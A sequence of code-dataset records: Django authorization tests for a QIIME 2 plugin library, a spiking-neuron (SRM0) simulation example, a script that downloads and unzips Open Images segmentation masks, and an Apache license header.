e9343bb0a4a709064b6a817b99f3b410cc7a3978
|
[
"BSD-3-Clause"
] | 10
|
2018-08-16T22:33:56.000Z
|
2022-01-05T18:18:01.000Z
|
# ----------------------------------------------------------------------------
# Copyright (c) 2018-2021, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from django import test
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group
from library.plugins.models import LegacyPlugin, LegacyPluginAuthorship
User = get_user_model()
_BASE_USER = {
'email': '',
'password': '',
'full_name': '',
'forum_external_id': '',
'forum_avatar_url': 'https://qiime2.org',
'forum_is_admin': False,
'forum_is_moderator': False,
}
_BASE_PLUGIN = {
'title': 'plugin',
'short_summary': 'lorem ipsum summary',
'description': 'lorem ipsum description',
'install_guide': 'lorem ipsum install',
'published': True,
'source_url': 'https://qiime2.org',
'version': '0.1.4',
}
class AnonymousUserAuthorizationTests(test.TestCase):
def setUp(self):
self.client = test.Client()
def test_legacy_plugin_list_no_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_list_some_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_detail_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/' % plugin.slug)
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_detail_published(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_new(self):
response = self.client.get('/plugins/new/')
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, '/login/?next=/plugins/new/')
def test_legacy_plugin_edit_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/edit/' % plugin.slug)
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_edit_published(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/edit/' % plugin.slug)
self.assertEqual(response.status_code, 404)
class LoggedInUserAuthorizationTests(test.TestCase):
@classmethod
def setUpTestData(cls):
cls.user = User.objects.create_user(
'user',
**{**_BASE_USER, 'forum_external_id': '1', 'password': 'peanut'})
def setUp(self):
self.client = test.Client()
self.client.login(username='user', password='peanut')
def test_legacy_plugin_list_no_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_list_some_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_detail_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/' % plugin.slug)
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_detail_published(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_new(self):
response = self.client.get('/plugins/new/')
self.assertEqual(response.status_code, 403)
def test_legacy_plugin_edit_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/edit/' % plugin.slug)
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_edit_published(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/edit/' % plugin.slug)
self.assertEqual(response.status_code, 404)
class AuthorAuthorizationTests(test.TestCase):
@classmethod
def setUpTestData(cls):
cls.user = User.objects.create_user(
'author',
**{**_BASE_USER, 'forum_external_id': '1', 'password': 'peanut'})
cls.user.groups.add(Group.objects.get(name='forum_trust_level_1'))
def setUp(self):
self.client = test.Client()
self.client.login(username='author', password='peanut')
def test_legacy_plugin_list_one_unpublished(self):
unpublished = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
LegacyPluginAuthorship.objects.create(plugin=unpublished, author=self.user, list_position=0)
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 1)
def test_legacy_plugin_list_one_published(self):
p = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
LegacyPluginAuthorship.objects.create(plugin=p, author=self.user, list_position=0)
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 1)
def test_legacy_plugin_list_published_and_unpublished(self):
p1 = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
LegacyPluginAuthorship.objects.create(plugin=p1, author=self.user, list_position=0)
p2 = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
LegacyPluginAuthorship.objects.create(plugin=p2, author=self.user, list_position=0)
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_detail_unpublished_not_coauthor(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_detail_unpublished_is_coauthor(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
LegacyPluginAuthorship.objects.create(plugin=plugin, author=self.user, list_position=0)
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_detail_published_not_coauthor(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_detail_published_is_coauthor(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
LegacyPluginAuthorship.objects.create(plugin=plugin, author=self.user, list_position=0)
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_new(self):
response = self.client.get('/plugins/new/')
self.assertEqual(response.status_code, 200)
def test_legacy_plugin_edit_unpublished_not_coauthor(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_edit_unpublished_is_coauthor(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
LegacyPluginAuthorship.objects.create(plugin=plugin, author=self.user, list_position=0)
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_edit_published_not_coauthor(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 404)
def test_legacy_plugin_edit_published_is_coauthor(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'unpublished_plugin'})
LegacyPluginAuthorship.objects.create(plugin=plugin, author=self.user, list_position=0)
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
class AdminAuthorizationTests(test.TestCase):
@classmethod
def setUpTestData(cls):
cls.user = User.objects.create_user(
'admin',
**{**_BASE_USER, 'forum_external_id': '1', 'password': 'peanut',
'is_superuser': True, 'forum_is_admin': True})
def setUp(self):
self.client = test.Client()
self.client.login(username='admin', password='peanut')
def test_legacy_plugin_list_no_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_1'})
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin_2'})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_list_some_unpublished(self):
LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'published_plugin'})
LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/')
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.context['plugins']), 2)
def test_legacy_plugin_detail_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_detail_published(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'unpublished_plugin'})
response = self.client.get('/plugins/%s/%d/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_new(self):
response = self.client.get('/plugins/new/')
self.assertEqual(response.status_code, 200)
def test_legacy_plugin_edit_unpublished(self):
plugin = LegacyPlugin.unsafe.create(
**{**_BASE_PLUGIN, 'title': 'unpublished_plugin', 'published': False})
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
def test_legacy_plugin_edit_published(self):
plugin = LegacyPlugin.unsafe.create(**{**_BASE_PLUGIN, 'title': 'unpublished_plugin'})
response = self.client.get('/plugins/%s/%d/edit/' % (plugin.slug, plugin.id))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.context['plugin'], plugin)
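These tests lean on LegacyPlugin.unsafe, a second model manager used to create plugins regardless of publication state. A minimal sketch of that manager pattern, assuming (this is an assumption about the library's models, not its actual code) that the default manager hides unpublished plugins:

from django.db import models

class PublishedManager(models.Manager):
    def get_queryset(self):
        # The default access path only sees published plugins.
        return super().get_queryset().filter(published=True)

class LegacyPlugin(models.Model):
    published = models.BooleanField(default=False)
    objects = PublishedManager()   # filtered default manager
    unsafe = models.Manager()      # bypasses the published filter, as in the tests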
| 39.687151
| 100
| 0.668778
| 1,577
| 14,208
| 5.797083
| 0.07863
| 0.088602
| 0.113214
| 0.116386
| 0.894006
| 0.894006
| 0.890396
| 0.882848
| 0.870378
| 0.870378
| 0
| 0.012659
| 0.177154
| 14,208
| 357
| 101
| 39.798319
| 0.76931
| 0.023508
| 0
| 0.752101
| 0
| 0
| 0.148637
| 0.001875
| 0
| 0
| 0
| 0
| 0.226891
| 1
| 0.168067
| false
| 0.029412
| 0.016807
| 0
| 0.201681
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d8994a553561499009f2944222a2904e3e2b47f
| 6,210
|
py
|
Python
|
examples/Example - SRM0 Neurons.py
|
bblais/Plasticnet
|
e450e56a9b993e361873b6a235fdcc55a5690abb
|
[
"MIT"
] | null | null | null |
examples/Example - SRM0 Neurons.py
|
bblais/Plasticnet
|
e450e56a9b993e361873b6a235fdcc55a5690abb
|
[
"MIT"
] | null | null | null |
examples/Example - SRM0 Neurons.py
|
bblais/Plasticnet
|
e450e56a9b993e361873b6a235fdcc55a5690abb
|
[
"MIT"
] | 1
|
2020-01-16T18:20:53.000Z
|
2020-01-16T18:20:53.000Z
|
# coding: utf-8
# In[1]:
from splikes import *
# In[13]:
from pylab import figure, legend, plot, linspace, xlabel, ylabel
# <img src="./images/epsp1.png">
# Input Rate: $\rho$
#
# Equation for Unsmoothed:
#
# \begin{eqnarray}
# u&\rightarrow& u+a\cdot w_i \mbox{ (input spike on input $i$)}\\
# \frac{du}{dt}&=& -u/\tau
# \end{eqnarray}
#
# Average value:
# \begin{eqnarray}
# <u> = a\cdot w\cdot \tau\cdot \rho
# \end{eqnarray}
#
# Equation for Smoothed:
#
# \begin{eqnarray}
# v&\rightarrow& v+a\cdot w_i \mbox{ (input spike on input $i$)}\\
# \frac{dv}{dt}&=& -v/\tau\\
# \frac{du}{dt}&=& (v-u)/\tau
# \end{eqnarray}
#
# Average value:
# \begin{eqnarray}
# <u> = a\cdot w\cdot \tau\cdot \rho
# \end{eqnarray}
#
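# As a quick sanity check of the mean formula: the $a=10$, $\tau=0.1$,
# $\rho=10$ Hz runs below should settle around $\langle u \rangle = 10$,
# which is exactly the red dashed reference line they draw.

a, w, tau, rho = 10.0, 1.0, 0.1, 10.0
print(a * w * tau * rho)  # 10.0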
# In[4]:
pre=neurons.poisson_pattern([10])
post=neurons.srm0(1)
post.smoothed=True
post.tau=0.01
post2=neurons.srm0(1)
post2.smoothed=False
post2.tau=0.01
post2.name='unsmoothed'
c=connection(pre,post,[1,1])
c2=connection(pre,post2,[1,1])
sim=simulation(.3,dt=0.0001)
sim.monitor(post,['u',],0.001)
sim.monitor(post2,['u',],0.001)
run_sim(sim,[pre,post,post2],[c,c2])
figure(figsize=(10,3))
m=sim.monitors['u']
m.plot()
m=sim.monitors['u [unsmoothed]']
m.plot()
legend(['Smoothed','Unsmoothed'])
# In[6]:
pre=neurons.poisson_pattern([20])
pre.save_spikes_begin=0.0
pre.save_spikes_end=10
post=neurons.srm0(1)
post.smoothed=True
post.tau=0.01
c=connection(pre,post,[1,1])
sim=simulation(2,dt=0.0001)
sim.monitor(post,['u',],0.001)
run_sim(sim,[pre,post],[c])
figure(figsize=(15,5))
m=sim.monitors['u']
m.plot()
for t,n in pre.saved_spikes:
plot([t,t],[0,0.1],'g',linewidth=3)
# In[7]:
pre.saved_spikes
# In[8]:
pre=neurons.poisson_pattern([10])
post=neurons.srm0(1)
post.smoothed=True
post.tau=0.1
post.a=10
post2=neurons.srm0(1)
post2.smoothed=False
post2.tau=0.1
post2.a=10
post2.name='unsmoothed'
c=connection(pre,post,[1,1])
c2=connection(pre,post2,[1,1])
sim=simulation(10,dt=0.0001)
sim.monitor(post,['u',],0.001)
sim.monitor(post2,['u',],0.001)
run_sim(sim,[pre,post,post2],[c,c2])
figure(figsize=(10,5))
m=sim.monitors['u']
m.plot()
m=sim.monitors['u [unsmoothed]']
m.plot()
legend(['Smoothed','Unsmoothed'])
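# the dashed line marks the predicted mean <u> = a*w*tau*rho = 10*1*0.1*10 = 10,
# and paramtext (an annotation helper, presumably provided by the splikes
# star-import above) labels the figure with the parameter values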
plot([0,11],[10,10],'r--',linewidth=3)
paramtext(0.15,0.7,
          r'%d Hz' % (10),
          r'$a=%.f$' % (post2.a),
          r'$\tau=%.1f$' % (post2.tau),
          )
# ### try with isi invgauss input
# In[9]:
ISI=neurons.isi_distributions.invgauss(0,1.0)
pre=neurons.isi_pattern([10],ISI)
pre.time_between_patterns=1*second
pre.save_spikes_begin=0
pre.save_spikes_end=10
post=neurons.srm0(1)
post.smoothed=True
post.tau=0.1
post.a=10
post.save_spikes_begin=0
post.save_spikes_end=10
post2=neurons.srm0(1)
post2.smoothed=False
post2.tau=0.1
post2.a=10
post2.name='unsmoothed'
post2.save_spikes_begin=0
post2.save_spikes_end=10
c=connection(pre,post,[1,1])
c2=connection(pre,post2,[1,1])
sim=simulation(10,dt=0.0001)
sim.monitor(post,['u',],0.001)
sim.monitor(post2,['u',],0.001)
run_sim(sim,[pre,post,post2],[c,c2])
figure(figsize=(10,5))
m=sim.monitors['u']
m.plot()
m=sim.monitors['u [unsmoothed]']
m.plot()
legend(['Smoothed','Unsmoothed'])
plot([0,11],[10,10],'r--',linewidth=3)
paramtext(0.15,0.7,
          r'%d Hz' % (10),
          r'$a=%.f$' % (post2.a),
          r'$\tau=%.1f$' % (post2.tau),
          )
figure()
pre.plot_spikes()
figure()
post.plot_spikes()
post2.plot_spikes(1)
# In[10]:
ISI=neurons.isi_distributions.invgauss(0,1.0)
pre=neurons.isi_pattern([10],ISI)
pre.time_between_patterns=1*second
pre.save_spikes_begin=0
pre.save_spikes_end=10
ISI2a=neurons.isi_distributions.invgauss(0,1.0)
ISI2b=neurons.isi_distributions.invgauss(0,1.0)
post=neurons.srm0_isi(1,ISI2a)
post.smoothed=True
post.tau=0.1
post.a=10
post.save_spikes_begin=0
post.save_spikes_end=10
post2=neurons.srm0_isi(1,ISI2b)
post2.smoothed=False
post2.tau=0.1
post2.a=10
post2.name='unsmoothed'
post2.save_spikes_begin=0
post2.save_spikes_end=10
c=connection(pre,post,[1,1])
c2=connection(pre,post2,[1,1])
sim=simulation(10,dt=0.0001)
sim.monitor(post,['u',],0.001)
sim.monitor(post2,['u',],0.001)
run_sim(sim,[pre,post,post2],[c,c2])
figure(figsize=(10,5))
m=sim.monitors['u']
m.plot()
m=sim.monitors['u [unsmoothed]']
m.plot()
legend(['Smoothed','Unsmoothed'])
plot([0,11],[10,10],'r--',linewidth=3)
paramtext(0.15,0.7,
          r'%d Hz' % (10),
          r'$a=%.f$' % (post2.a),
          r'$\tau=%.1f$' % (post2.tau),
          )
figure()
pre.plot_spikes()
figure()
post.plot_spikes()
post2.plot_spikes(1)
# In[11]:
c.weights
# <img src="images/input_rate1.png">
# In[15]:
from pylab import mean
# In[16]:
rate_arr=linspace(1,50,100)
#print rate_arr
mean_arr=[]
for rate in rate_arr:
    pre=neurons.poisson_pattern([rate])
    post=neurons.srm0(1)
    post.tau=0.1
    post.a=10.0
    c=connection(pre,post,[1,1])
    sim=simulation(10,dt=0.0001)
    sim.monitor(post,['u',],0.001)
    run_sim(sim,[pre,post],[c],print_time=False)
    u=sim.monitors['u'].array()
    mean_arr.append(mean(u))
plot(rate_arr,mean_arr,'o')
xlabel(r'Input Rate ($\rho$)')
ylabel('Mean $u$')
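# overlay the analytic prediction <u> = w*rho*a*tau (here w=1) as a red dashed line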
plot(rate_arr,rate_arr*post.a*post.tau,'r--')
paramtext(.2,.7,
          r'$a=%s$' % post.a,
          r'$\tau=%s$' % post.tau,
          r'$w=%s$' % float(c.weights),
          )
paramtext(.5,.9,
          r'$\langle u \rangle = w\cdot \rho \cdot a \cdot \tau$')
# <img src="images/weight_dependence1.png">
# In[17]:
w_arr=linspace(0.01,2,100)
#print w_arr
mean_arr=[]
rate=10
for w in w_arr:
    pre=neurons.poisson_pattern([rate])
    post=neurons.srm0(1)
    post.tau=0.1
    post.a=10.0
    c=connection(pre,post,[w,w])
    sim=simulation(10,dt=0.0001)
    sim.monitor(post,['u',],0.001)
    run_sim(sim,[pre,post],[c],print_time=False)
    u=sim.monitors['u'].array()
    mean_arr.append(mean(u))
plot(w_arr,mean_arr,'o')
xlabel('Connection Strength')
ylabel('Mean $u$')
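# overlay the analytic prediction <u> = w*rho*a*tau as a red dashed line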
plot(w_arr,w_arr*rate*post.a*post.tau,'r--')
paramtext(.2,.7,
          r'$a=%s$' % post.a,
          r'$\tau=%s$' % post.tau,
          r'$\rho=%s$' % rate,
          )
paramtext(.5,.9,
          r'$\langle u \rangle = w\cdot \rho \cdot a \cdot \tau$')
# In[ ]:
| 17.44382
| 66
| 0.633333
| 1,072
| 6,210
| 3.590485
| 0.117537
| 0.025461
| 0.014289
| 0.030398
| 0.822292
| 0.799688
| 0.799688
| 0.777085
| 0.768511
| 0.768511
| 0
| 0.073662
| 0.14525
| 6,210
| 355
| 67
| 17.492958
| 0.651469
| 0.126248
| 0
| 0.810945
| 0
| 0
| 0.088624
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014925
| 0
| 0.014925
| 0.00995
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5db4b6cbe3f3d4a96436aeb98805fe9395f0b855
| 5,289
|
py
|
Python
|
pipeline/scripts/download_segs.py
|
deplatformr/open-images
|
3726c9802bda1d7ecbbbd9920d5566daaecc9faa
|
[
"MIT"
] | 2
|
2020-10-12T02:37:54.000Z
|
2020-10-14T15:16:49.000Z
|
pipeline/scripts/download_segs.py
|
deplatformr/open-images
|
3726c9802bda1d7ecbbbd9920d5566daaecc9faa
|
[
"MIT"
] | null | null | null |
pipeline/scripts/download_segs.py
|
deplatformr/open-images
|
3726c9802bda1d7ecbbbd9920d5566daaecc9faa
|
[
"MIT"
] | null | null | null |
import requests
import os
import shutil
from zipfile import ZipFile
download_dir = os.path.join(os.getcwd(), "source_data/segmentations")
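# make sure the target directory exists before streaming downloads into it
# (an added safeguard; the original script assumes it was created beforehand)
os.makedirs(download_dir, exist_ok=True)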
urls = ("https://storage.googleapis.com/openimages/v5/train-masks/train-masks-0.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-1.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-2.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-3.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-4.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-5.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-6.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-7.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-8.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-9.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-a.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-b.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-c.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-d.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-e.zip",
"https://storage.googleapis.com/openimages/v5/train-masks/train-masks-f.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-0.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-1.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-2.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-3.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-4.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-5.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-6.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-7.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-8.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-9.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-a.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-b.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-c.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-d.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-e.zip",
"https://storage.googleapis.com/openimages/v5/validation-masks/validation-masks-f.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-0.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-1.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-2.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-3.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-4.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-5.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-6.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-7.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-8.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-9.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-a.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-b.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-c.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-d.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-e.zip",
"https://storage.googleapis.com/openimages/v5/test-masks/test-masks-f.zip")
for url in urls:
    try:
        # derive the local file path from the URL's basename
        split = os.path.split(url)
        filename = split[1]
        filepath = os.path.join(download_dir, filename)
        response = requests.get(url, stream=True, timeout=(3, 10))
        # stream the response body to disk; the context manager closes the
        # file handle before the archive is unzipped below
        with open(filepath, "wb") as file:
            response.raw.decode_content = True
            shutil.copyfileobj(response.raw, file)
    except Exception as e:
        print("Unable to download zip file.")
        print(e)
        continue
    try:
        # extract into a directory named after the archive (without .zip)
        split = os.path.splitext(filename)
        dir_name = os.path.join(download_dir, split[0])
        with ZipFile(filepath, 'r') as unzip_dir:
            unzip_dir.extractall(dir_name)
    except Exception as e:
        print("Unable to unzip file.")
        print(e)
        continue
    try:
        # remove the archive once its contents have been extracted
        os.remove(filepath)
    except Exception as e:
        print("Unable to delete zip file.")
        print(e)
        continue
| 59.426966
| 95
| 0.698431
| 709
| 5,289
| 5.197461
| 0.108604
| 0.156309
| 0.286567
| 0.325645
| 0.882768
| 0.85346
| 0.85346
| 0.828223
| 0.828223
| 0.815468
| 0
| 0.01817
| 0.136321
| 5,289
| 88
| 96
| 60.102273
| 0.788529
| 0
| 0
| 0.148148
| 0
| 0.592593
| 0.715258
| 0.004727
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.049383
| 0
| 0.049383
| 0.074074
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
b90f6c7146a94bc400065daf31a83dca7975e93b
| 44,237
|
py
|
Python
|
ambari-server/src/test/python/stacks/2.6/ZEPPELIN/interpreter_json_generated.py
|
zyclove/ambari
|
1032f0f54cb7b312b9a3b37570cd840f4e1e89d4
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.6/ZEPPELIN/interpreter_json_generated.py
|
zyclove/ambari
|
1032f0f54cb7b312b9a3b37570cd840f4e1e89d4
|
[
"Apache-2.0"
] | null | null | null |
ambari-server/src/test/python/stacks/2.6/ZEPPELIN/interpreter_json_generated.py
|
zyclove/ambari
|
1032f0f54cb7b312b9a3b37570cd840f4e1e89d4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
